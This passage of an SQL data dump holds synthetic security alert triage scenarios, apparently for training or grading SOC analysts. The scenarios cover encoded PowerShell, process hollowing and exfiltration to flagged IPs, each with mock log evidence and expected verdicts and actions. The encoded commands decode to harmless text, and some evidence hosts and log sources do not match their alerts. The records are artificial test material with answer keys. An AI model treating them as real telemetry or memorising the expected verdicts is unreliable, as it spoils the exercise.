ZWNobyAnU3lzdGVtIEFkbWluaXN0cmF0aW9uIFRhc2sn\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.064Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DC-01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnU3lzdGVtIEFkbWluaXN0cmF0aW9uIFRhc2sn\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.064Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DC-01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnU3lzdGVtIEFkbWluaXN0cmF0aW9uIFRhc2sn\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.064Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DC-01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnU3lzdGVtIEFkbWluaXN0cmF0aW9uIFRhc2sn\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.064Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DC-01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnU3lzdGVtIEFkbWluaXN0cmF0aW9uIFRhc2sn\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1718, 'Process Hollowing Activity Detected in benign_app.exe', 'medium', 'SentinelOne', 'Process hollowing detected within benign_app.exe. Initial investigation suggests this is part of legitimate software behavior.', 'Malware', 'T1055.012', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T15:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.75\",\"dst_ip\":\"\",\"username\":\"user1\",\"hostname\":\"DESKTOP-05\",\"command_line\":\"benign_app.exe hollowed_process.exe\"}', '2026-03-15 19:48:17', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"hollowed_process.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"File recognized as part of legitimate application suite\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"benign_app.exe hollowed_process.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Process behavior consistent with legitimate software update mechanism\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.75\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process behavior aligns with known legitimate applications, suggesting a false positive.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.066Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.75\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"DESKTOP-05\\\",\\\"command_line\\\":\\\"benign_app.exe hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.066Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.75\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"DESKTOP-05\\\",\\\"command_line\\\":\\\"benign_app.exe hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.066Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.75\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"DESKTOP-05\\\",\\\"command_line\\\":\\\"benign_app.exe hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.066Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.75\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"DESKTOP-05\\\",\\\"command_line\\\":\\\"benign_app.exe hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.066Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.75\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"DESKTOP-05\\\",\\\"command_line\\\":\\\"benign_app.exe hollowed_process.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1719, 'PowerShell Download Cradle Execution Detected', 'critical', 'CrowdStrike', 'A PowerShell script was executed on host FIN-SRV01, downloading an encoded script indicative of a potential malware attack.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T03:45:32Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"FIN-SRV01\",\"request_body\":\"\",\"command_line\":\"powershell.exe -EncodedCommand aGVsbG8gd29ybGQ=\"}', '2026-03-15 19:48:49', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand aGVsbG8gd29ybGQ=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command execution detected\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell commands is a strong indicator of malicious activity.\"}', 'Intermediate', 'EDR', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1720, 'Suspicious Process Hollowing in explorer.exe', 'high', 'SentinelOne', 'Process hollowing technique detected in explorer.exe, indicating potential code injection from an external source.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:15:47Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.12\",\"dst_ip\":\"192.168.1.15\",\"username\":\"alice\",\"hostname\":\"WORKSTATION01\",\"request_body\":\"\",\"command_line\":\"explorer.exe hollowed_process.exe\"}', '2026-03-15 19:48:49', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for suspicious activity, including process injection attempts\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"explorer.exe hollowed_process.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Process hollowing technique detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Process hollowing is a technique often used by malware to hide its execution.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.069Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:47Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.12\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"alice\\\",\\\"hostname\\\":\\\"WORKSTATION01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"explorer.exe hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.069Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:47Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.12\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"alice\\\",\\\"hostname\\\":\\\"WORKSTATION01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"explorer.exe hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.069Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:47Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.12\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"alice\\\",\\\"hostname\\\":\\\"WORKSTATION01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"explorer.exe hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.069Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:47Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.12\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"alice\\\",\\\"hostname\\\":\\\"WORKSTATION01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"explorer.exe hollowed_process.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.069Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:47Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.12\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"alice\\\",\\\"hostname\\\":\\\"WORKSTATION01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"explorer.exe hollowed_process.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1721, 'Encoded PowerShell Command Detected', 'medium', 'Carbon Black', 'PowerShell executed with an encoded command, potentially indicating an obfuscated script delivery.', 'Malware', 'T1059.001', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:22:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.25\",\"dst_ip\":\"\",\"username\":\"bsmith\",\"hostname\":\"HR-LAPTOP\",\"request_body\":\"\",\"command_line\":\"powershell.exe -EncodedCommand ZWNobyAnVXNlciBpbmZvIGR1bXBlZCEn\"}', '2026-03-15 19:48:49', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected laptop\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand ZWNobyAnVXNlciBpbmZvIGR1bXBlZCEn\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command execution detected\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoded PowerShell commands can indicate attempts to execute obfuscated scripts.\"}', 'Intermediate', 'EDR', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.070Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"HR-LAPTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnVXNlciBpbmZvIGR1bXBlZCEn\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.070Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"HR-LAPTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnVXNlciBpbmZvIGR1bXBlZCEn\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.070Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"HR-LAPTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnVXNlciBpbmZvIGR1bXBlZCEn\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.070Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"HR-LAPTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnVXNlciBpbmZvIGR1bXBlZCEn\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.070Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.25\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"HR-LAPTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnVXNlciBpbmZvIGR1bXBlZCEn\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1722, 'Benign PowerShell Execution Alert', 'low', 'Sysmon', 'Detected a PowerShell command execution on host IT-ADMIN1, appears to be a routine administrative task.', 'Process Execution', 'T1059.001', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:50:22Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.5\",\"dst_ip\":\"\",\"username\":\"admin\",\"hostname\":\"IT-ADMIN1\",\"request_body\":\"\",\"command_line\":\"powershell.exe -Command Get-ADUser\"}', '2026-03-15 19:48:49', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of an administrative machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -Command Get-ADUser\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"clean\",\"details\":\"Routine administrative PowerShell command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"process_execution\",\"analysis_notes\":\"The command was identified as a standard administrative task, confirming a false positive.\"}', 'Intermediate', 'EDR', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.072Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:50:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"IT-ADMIN1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -Command Get-ADUser\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.072Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:50:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"IT-ADMIN1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -Command Get-ADUser\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.072Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:50:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"IT-ADMIN1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -Command Get-ADUser\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.072Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:50:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"IT-ADMIN1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -Command Get-ADUser\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.072Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:50:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"IT-ADMIN1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -Command Get-ADUser\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1723, 'Suspicious Network Connection to Known Malicious IP', 'critical', 'CrowdStrike', 'Detected a network connection from internal host to a known malicious external IP, indicating a potential data exfiltration attempt.', 'Data Exfiltration', 'T1041', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T02:16:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.45\",\"dst_ip\":\"198.51.100.23\",\"username\":\"cjohnson\",\"hostname\":\"ENG-SRV02\",\"request_body\":\"\"}', '2026-03-15 19:48:49', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for data exfiltration activities\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The connection to a known malicious IP suggests possible data exfiltration.\"}', 'Intermediate', 'EDR', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1724, 'False Positive: Routine PowerShell Script Execution', 'low', 'Carbon Black', 'A PowerShell command was executed on host DEV-WORKSTATION during a routine update process.', 'Process Execution', 'T1059.001', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T07:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.4.55\",\"dst_ip\":\"\",\"username\":\"david\",\"hostname\":\"DEV-WORKSTATION\",\"request_body\":\"\",\"command_line\":\"powershell.exe -Command Update-Help\"}', '2026-03-15 19:48:49', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a development workstation\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -Command Update-Help\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"clean\",\"details\":\"Routine PowerShell help update command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"process_execution\",\"analysis_notes\":\"The command corresponds to a standard help update operation, confirming a false positive.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.075Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"david\\\",\\\"hostname\\\":\\\"DEV-WORKSTATION\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -Command Update-Help\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.075Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"david\\\",\\\"hostname\\\":\\\"DEV-WORKSTATION\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -Command Update-Help\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.075Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 